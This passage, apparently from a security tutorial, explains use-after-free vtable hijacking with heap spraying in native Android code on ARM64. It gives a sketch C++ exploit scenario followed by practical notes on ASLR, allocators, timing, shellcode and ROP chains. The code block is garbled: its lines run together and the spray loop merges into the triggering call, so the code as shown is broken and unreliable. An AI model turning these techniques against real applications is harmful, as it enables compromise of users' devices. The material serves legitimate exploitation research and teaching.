Example: VTable Hijacking via UAF & Spray

Consider our MaliciousObject example with a virtual function. If it were a C++ object with a vtable, a UAF could allow us to overwrite its vtable pointer.
```
// Original vulnerable class (modified for virtual function)class VulnerableClass {public:    virtual void virtual_method() {        // Default implementation    }    // ... other members ...};void exploit_scenario() {    VulnerableClass* vuln_obj = new VulnerableClass();    // ... use vuln_obj ...    delete vuln_obj; // UAF point! Memory is freed.    // Attacker's turn: Heap spray    // Allocate many objects of the same size as VulnerableClass.    // These 'fake' objects contain a controlled vtable pointer    // pointing to attacker-controlled data (e.g., shellcode or ROP chain).    // `fake_vtable_ptr` would point to a crafted vtable in attacker-controlled memory.    // `shellcode_address` would be the address of our shellcode.    unsigned long fake_vtable[] = {shellcode_address}; // Simplified    char spray_data[sizeof(VulnerableClass)];    memcpy(spray_data, &fake_vtable, sizeof(unsigned long)); // Overwrite vtable ptr    // Fill rest of spray_data if needed    for (int i = 0; i virtual_method(); // UAF triggered!    // If a sprayed object occupied vuln_obj's memory,    // this call will jump to `fake_vtable[0]`, i.e., `shellcode_address`.}
```
In ARM64, the vtable pointer is typically the first 8 bytes of the object. By spraying objects of the same size as `VulnerableClass` and placing our `fake_vtable_ptr` at the beginning of our spray data, we can redirect the `virtual_method` call to an arbitrary address.

Practical Considerations for ARM64 Android
- Heap Profiling: Use tools like `jemalloc`’s profiling features (if enabled) or `gdb-multiarch` with appropriate scripts to observe heap behavior and identify suitable chunk sizes.
- Memory Layout: Android’s ASLR (Address Space Layout Randomization) will randomize library base addresses and stack/heap locations. Heap spraying helps with relative predictability within the heap, but absolute addresses (for shellcode, ROP gadgets) often require an information leak first.
- Allocation Primitives: Not all allocations are equal. Depending on the NDK library, `malloc`/`free`, `new`/`delete`, or custom allocators might be in use. Understanding the specific allocator helps in precise heap feng shui.
- Timing: The timing between `free` and subsequent `alloc` (spray) is crucial. Race conditions can make exploitation unreliable without careful synchronization.
- Payloads: Shellcode for ARM64 needs to be carefully crafted, considering register usage (e.g., `x0-x7` for arguments), system call numbers, and alignment. ROP chains are often used to bypass DEP/NX.
Conclusion

Advanced NDK exploit primitives like User-After-Free and heap spraying remain fundamental techniques for compromising native Android applications on ARM64. While UAF provides the initial memory corruption primitive, heap spraying transforms an unreliable memory state into a predictable environment, paving the way for reliable exploitation. Understanding these concepts, along with a deep dive into ARM64 architecture and Android’s native runtime, is essential for anyone involved in security research, penetration testing, or vulnerability analysis on the Android platform. Mastering these techniques opens doors to uncovering and mitigating complex security flaws in production software.
May 29, 2026